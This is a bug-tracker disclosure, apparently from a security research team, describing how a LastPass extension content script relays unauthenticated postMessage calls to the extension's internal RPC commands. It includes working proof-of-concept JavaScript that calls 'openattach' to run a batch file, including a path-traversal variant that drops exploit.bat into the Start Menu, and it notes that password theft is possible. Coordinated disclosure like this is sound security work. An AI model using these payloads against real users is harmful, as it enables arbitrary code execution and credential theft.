New issue
Advanced search Search tips

Issue 1209 link

Starred by 11 users

Issue metadata

Status: Fixed
Closed: Mar 2017

Sign in to add a comment

LastPass: websiteConnector.js content script allows proxying internal RPC commands

Project Member Reported by, Mar 20 2017

Issue description

I noticed this entry in the content_script array from the LastPass manifest:

			"matches": [
			"js": [
			"all_frames": true,
			"run_at": "document_end"

That's a content script that is only used for one specific domain, if we look at the script:

$ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js
window.addEventListener("message", function(e) { || chrome.runtime.sendMessage(, function(e) {});

That doesn't look good, this script will proxy unauthenticated window messages to the extension. This is clearly a mistake, because anybody can do

win ="");
win.postMessage({}, "*");

Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things copying and filling in passwords (copypass, fillform, etc). If you install the binary component (, you can also use "openattach" to run arbitrary code.

For example, this will run calc.exe:

win ="");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:.bat"}, "*");

(This code will need to be inside an onclick handler to open a popup).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Windows 7-2017-03-20-16-14-27.png
104 KB View Download

Comment 1 Deleted

Project Member

Comment 2 by, Mar 21 2017

Ah, this version is better, it works without a prompt on Windows 10:

win ="");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

This requires that the user has enabled "Binary Component" (Click LastPass->More Options->About LastPass), but you can actually force lastpass to prompt the user to install it with another RPC.

Otherwise, you will have to settle for just stealing passwords :)

Comment 3 Deleted

Project Member

Comment 4 by, Mar 21 2017

LastPass responded and said they have NXDOMAIN'd while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

Nevertheless, disabling seems like a good enough mitigation for now.
Project Member

Comment 5 by, Mar 21 2017

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
I've uploaded the exploit here:

It looks like LastPass now consider this issue resolved:

Hopefully they have taken down the service and not just removed the DNS entry, or a mitm can still insert correct DNS responses. 

Additionally, if any corporate intercepting ssl proxy is returning custom error pages for NXDOMAIN then this might still be exploitable, you should test the exploit if you think this might apply to you and contact your administrator if necessary.

Marking fixed.

(Please note,  issue 1188  which affects LastPass on firefox is not fixed, and still works)

Sign in to add a comment